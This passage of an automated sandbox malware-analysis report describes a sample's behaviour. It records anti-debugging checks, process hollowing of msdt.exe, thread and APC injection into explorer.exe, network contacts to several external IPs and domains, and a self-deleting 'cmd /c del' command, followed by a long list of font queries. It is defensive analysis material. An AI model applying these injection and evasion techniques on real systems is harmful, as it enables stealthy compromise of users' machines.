          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]15_2_04AF03E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]15_2_04AF03E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]15_2_04AF03E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B453CA mov eax, dword ptr fs:[00000030h]15_2_04B453CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B453CA mov eax, dword ptr fs:[00000030h]15_2_04B453CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC4F2E mov eax, dword ptr fs:[00000030h]15_2_04AC4F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC4F2E mov eax, dword ptr fs:[00000030h]15_2_04AC4F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFE730 mov eax, dword ptr fs:[00000030h]15_2_04AFE730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA70E mov eax, dword ptr fs:[00000030h]15_2_04AFA70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA70E mov eax, dword ptr fs:[00000030h]15_2_04AFA70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B8131B mov eax, dword ptr fs:[00000030h]15_2_04B8131B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5FF10 mov eax, dword ptr fs:[00000030h]15_2_04B5FF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5FF10 mov eax, dword ptr fs:[00000030h]15_2_04B5FF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9070D mov eax, dword ptr fs:[00000030h]15_2_04B9070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9070D mov eax, dword ptr fs:[00000030h]15_2_04B9070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEF716 mov eax, dword ptr fs:[00000030h]15_2_04AEF716
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACDB60 mov ecx, dword ptr fs:[00000030h]15_2_04ACDB60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADFF60 mov eax, dword ptr fs:[00000030h]15_2_04ADFF60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98F6A mov eax, dword ptr fs:[00000030h]15_2_04B98F6A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF3B7A mov eax, dword ptr fs:[00000030h]15_2_04AF3B7A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF3B7A mov eax, dword ptr fs:[00000030h]15_2_04AF3B7A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98B58 mov eax, dword ptr fs:[00000030h]15_2_04B98B58
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACDB40 mov eax, dword ptr fs:[00000030h]15_2_04ACDB40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADEF40 mov eax, dword ptr fs:[00000030h]15_2_04ADEF40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACF358 mov eax, dword ptr fs:[00000030h]15_2_04ACF358
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00409B50 LdrLoadDll,5_2_00409B50
          Source: C:\Users\user\Desktop\divpCHa0h7.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.161 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mambacustomboats.com
          Source: C:\Windows\explorer.exeDomain query: www.sanlifalan.com
          Source: C:\Windows\explorer.exeDomain query: www.esyscoloradosprings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.165.34.6 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 108.167.135.122 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ribbonofficial.com
          Source: C:\Windows\explorer.exeDomain query: www.floaterslaser.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\divpCHa0h7.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 2F0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\divpCHa0h7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\divpCHa0h7.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\divpCHa0h7.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exeJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exeJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exeJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'Jump to behavior
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000006.00000000.337048787.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Users\user\Desktop\divpCHa0h7.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
